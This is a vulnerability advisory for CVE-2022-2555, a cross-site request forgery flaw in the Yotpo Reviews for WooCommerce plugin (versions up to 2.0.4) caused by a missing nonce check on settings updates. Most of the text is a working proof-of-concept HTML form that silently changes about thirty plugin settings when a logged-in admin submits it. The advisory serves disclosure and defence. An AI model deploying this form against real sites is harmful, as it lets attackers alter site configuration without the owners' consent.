Yotpo Reviews for WooCommerce <= 2.0.4 – Arbitrary Settings Update via CSRF | CVE 2022-2555

Description

The plugin lacks nonce check when updating its settings, which could allow attacker to make a logged in admin change them via a CSRF attack.

Proof of Concept

Use the following form to abuse the lack of nonce:

<html>
   <form enctype="application/x-www-form-urlencoded" method="POST" action="http://example.com/wp-admin/admin.php?page=yotpo-debug">
      <table>
         <tr>
            <td>app_key</td>
            <td><input type="text" value="123123123" name="app_key"></td>
         </tr>
         <tr>
            <td>authenticated</td>
            <td><input type="text" value=" true" name="authenticated"></td>
         </tr>
         <tr>
            <td>widget_location</td>
            <td><input type="text" value="footer" name="widget_location"></td>
         </tr>
         <tr>
            <td>language_code</td>
            <td><input type="text" value="en" name="language_code"></td>
         </tr>
         <tr>
            <td>widget_tab_name</td>
            <td><input type="text" value="Reviews" name="widget_tab_name"></td>
         </tr>
         <tr>
            <td>bottom_line_enabled_product</td>
            <td><input type="text" value=" true" name="bottom_line_enabled_product"></td>
         </tr>
         <tr>
            <td>qna_enabled_product</td>
            <td><input type="text" value=" true" name="qna_enabled_product"></td>
         </tr>
         <tr>
            <td>bottom_line_enabled_category</td>
            <td><input type="text" value=" true" name="bottom_line_enabled_category"></td>
         </tr>
         <tr>
            <td>yotpo_language_as_site</td>
            <td><input type="text" value="1" name="yotpo_language_as_site"></td>
         </tr>
         <tr>
            <td>show_submit_past_orders</td>
            <td><input type="text" value="" name="show_submit_past_orders"></td>
         </tr>
         <tr>
            <td>yotpo_order_status</td>
            <td><input type="text" value="wc-completed" name="yotpo_order_status"></td>
         </tr>
         <tr>
            <td>disable_native_review_system</td>
            <td><input type="text" value=" true" name="disable_native_review_system"></td>
         </tr>
         <tr>
            <td>debug_mode</td>
            <td><input type="text" value=" true" name="debug_mode"></td>
         </tr>
         <tr>
            <td>debug_level</td>
            <td><input type="text" value="info" name="debug_level"></td>
         </tr>
         <tr>
            <td>main_widget_hook</td>
            <td><input type="text" value="woocommerce_after_single_product" name="main_widget_hook"></td>
         </tr>
         <tr>
            <td>main_widget_priority</td>
            <td><input type="text" value="10" name="main_widget_priority"></td>
         </tr>
         <tr>
            <td>product_bottomline_hook</td>
            <td><input type="text" value="woocommerce_single_product_summary" name="product_bottomline_hook"></td>
         </tr>
         <tr>
            <td>product_bottomline_priority</td>
            <td><input type="text" value="7" name="product_bottomline_priority"></td>
         </tr>
         <tr>
            <td>product_qna_hook</td>
            <td><input type="text" value="woocommerce_single_product_summary" name="product_qna_hook"></td>
         </tr>
         <tr>
            <td>product_qna_priority</td>
            <td><input type="text" value="8" name="product_qna_priority"></td>
         </tr>
         <tr>
            <td>category_bottomline_hook</td>
            <td><input type="text" value="woocommerce_after_shop_loop_item" name="category_bottomline_hook"></td>
         </tr>
         <tr>
            <td>category_bottomline_priority</td>
            <td><input type="text" value="7" name="category_bottomline_priority"></td>
         </tr>
         <tr>
            <td>timeframe_from</td>
            <td><input type="text" value="90" name="timeframe_from"></td>
         </tr>
         <tr>
            <td>timeframe_to</td>
            <td><input type="text" value="0" name="timeframe_to"></td>
         </tr>
         <tr>
            <td>order_submission_method</td>
            <td><input type="text" value="hook" name="order_submission_method"></td>
         </tr>
         <tr>
            <td>widget_jsinject_selector</td>
            <td><input type="text" value="section#primary" name="widget_jsinject_selector"></td>
         </tr>
         <tr>
            <td>jsinject_selector_rating</td>
            <td><input type="text" value=".entry-title" name="jsinject_selector_rating"></td>
         </tr>
         <tr>
            <td>jsinject_selector_qna</td>
            <td><input type="text" value=".entry-title" name="jsinject_selector_qna"></td>
         </tr>
         <tr>
            <td>update_settings</td>
            <td><input type="text" value="yeah" name="update_settings"></td>
         </tr>
      </table>
      <input type="submit" value="http://localhost/wp-admin/admin.php?page=yotpo-debug">
   </form>
</html>